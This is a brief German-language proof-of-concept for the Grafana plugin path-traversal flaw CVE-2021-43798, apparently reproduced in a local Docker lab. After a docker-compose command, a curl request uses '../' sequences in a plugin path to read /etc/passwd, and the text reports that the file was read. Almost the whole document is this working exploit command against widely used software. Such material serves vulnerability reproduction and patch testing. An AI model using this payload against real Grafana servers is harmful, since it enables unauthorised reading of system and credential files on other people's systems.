
Proof-of-Concept-Exploit für die Grafana-Pfad-Traversal-Schwachstelle (CVE-2021-43798), die unbefugtes Lesen von Dateien durch Directory Traversal in Plugin-Pfaden ermöglicht.
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd
Dadurch konnte auf etc/passwd zugegriffen werden.